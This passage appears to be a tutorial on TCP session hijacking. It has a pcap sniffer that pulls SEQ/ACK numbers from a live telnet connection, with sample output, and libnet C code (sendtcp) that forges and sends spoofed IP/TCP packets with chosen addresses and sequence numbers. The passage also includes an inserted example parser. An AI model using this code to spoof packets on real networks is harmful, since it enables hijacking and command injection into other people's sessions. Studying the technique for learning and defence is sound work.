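This program is adapted from existing code. It uses pcap to capture packets and decodes each captured packet; when it finds one with the ACK flag set, it extracts the SEQ and ACK values from that packet.
Build and run the program to find the SEQ and ACK: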
[root@chi chi]# gcc -o get_seq_ack get_seq_ack.c `libnet-config --defines` `libnet-config --libs` -lpcap -lnet
[root@chi chi]# ./get_seq_ack
get_seq_ack.c
./get_seq_ack
[root@chi chi]# ./get_seq_ack 192.168.25.1 192.168.25.4
device = eth0
Connection form 192.168.25.1 to 192.168.25.4
wait for SEQ/ACK :
Got packet! SEQ = 0x4eb9d6ca ACK = 0x83005cc
source_port is 3486
dest_port is 23
[root@chi chi]#
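The decoding step described at the top of this page (check for the ACK flag, then read SEQ and ACK from the TCP header) can be written as follows. This is an added example, not the original get_seq_ack.c; `parse_seq_ack`, `struct seq_ack` and the sample packet bytes are constructed for illustration, and the buffer is assumed to start at the IP header.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

struct seq_ack { uint32_t seq, ack; uint16_t sport, dport; };

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Decode an IPv4 packet (link-layer header already skipped). Returns 0 and
 * fills *out only for a TCP segment with ACK set; returns -1 for truncated,
 * non-IPv4, non-TCP, later-fragment or non-ACK input. */
int parse_seq_ack(const uint8_t *ip, size_t len, struct seq_ack *out)
{
    if (len < 20 || (ip[0] >> 4) != 4) return -1;   /* VERS must be 4 */
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;        /* HLEN counts 32-bit words */
    if (ihl < 20 || len < ihl + 20) return -1;      /* need a full TCP header */
    if (ip[9] != 6) return -1;                      /* protocol 6 = TCP */
    if ((be16(ip + 6) & 0x1fff) != 0) return -1;    /* later fragment: no TCP header */
    const uint8_t *tcp = ip + ihl;
    if (!(tcp[13] & 0x10)) return -1;               /* ACK flag not set */
    out->sport = be16(tcp);
    out->dport = be16(tcp + 2);
    out->seq   = be32(tcp + 4);                     /* fields are big-endian on the wire */
    out->ack   = be32(tcp + 8);
    return 0;
}

/* Constructed sample: 192.168.25.1:3486 -> 192.168.25.4:23, ACK set.
 * Checksums are left as zero because the parser does not verify them. */
const uint8_t sample_pkt[40] = {
    0x45,0x00,0x00,0x28, 0x00,0x01,0x40,0x00, 0x40,0x06,0x00,0x00,
    192,168,25,1, 192,168,25,4,
    0x0d,0x9e, 0x00,0x17, 0x4e,0xb9,0xd6,0xca, 0x08,0x30,0x05,0xcc,
    0x50,0x10, 0xff,0xff, 0x00,0x00, 0x00,0x00
};

int main(void)
{
    struct seq_ack r;
    if (parse_seq_ack(sample_pkt, sizeof sample_pkt, &r) == 0)
        printf("SEQ = 0x%x ACK = 0x%x sport %u dport %u\n",
               (unsigned)r.seq, (unsigned)r.ack, (unsigned)r.sport, (unsigned)r.dport);
    return 0;
}
```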
The values SEQ = 0x4eb9d6ca and ACK = 0x83005cc shown above are what we use next to build the "fake" IP and TCP packets.
======================================================================================
Next we first build the IP packet to send. Below is the IP protocol header; building the IP packet with libnet is simple.
IP protocol:
0       4       8               16    19        24             32
-----------------------------------------------------------------
| VERS  | HLEN  | Service Type  |         Total Length          |
-----------------------------------------------------------------
|        Identification         |Flags|     Fragment Offset     |
-----------------------------------------------------------------
|                       Source IP Address                       |
-----------------------------------------------------------------
|                    Destination IP Address                     |
-----------------------------------------------------------------
|                  IP Options                   |    Padding    |
-----------------------------------------------------------------
|                             Data                              |
-----------------------------------------------------------------
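I won't go through the IP packet in detail here, as it is too tedious. Instead I will simply build an IP packet and a TCP packet with libnet. If you don't follow it, scz has written an introduction to libnet that explains clearly what you need to do.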
/******************************************************************************/
/* Written by spwny */
#include <libnet.h>

void
sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
{
    u_char *packet;
    int fd, psize;

    /* Buffer must hold the IP header, the TCP header and the payload */
    psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
    libnet_init_packet(psize, &packet);
    if (!packet)
        libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");

    /* Raw socket used to write the finished packet */
    if ((fd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
        libnet_error(LIBNET_ERR_FATAL, "libnet_open_raw_sock failed\n");

    /* IP header: random ID, TTL from lrandom(128, 255), protocol TCP.
     * lrandom() is not a standard C library function and is not shown on this page. */
    libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);

    /* TCP header placed directly after the IP header, with the given SEQ/ACK and flags */
    libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);

    /* Compute the TCP checksum over header plus payload */
    if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
        libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");

    libnet_write_ip(fd, packet, psize);
    libnet_close_raw_sock(fd);
    libnet_destroy_packet(&packet);
}
/********************************************************************************/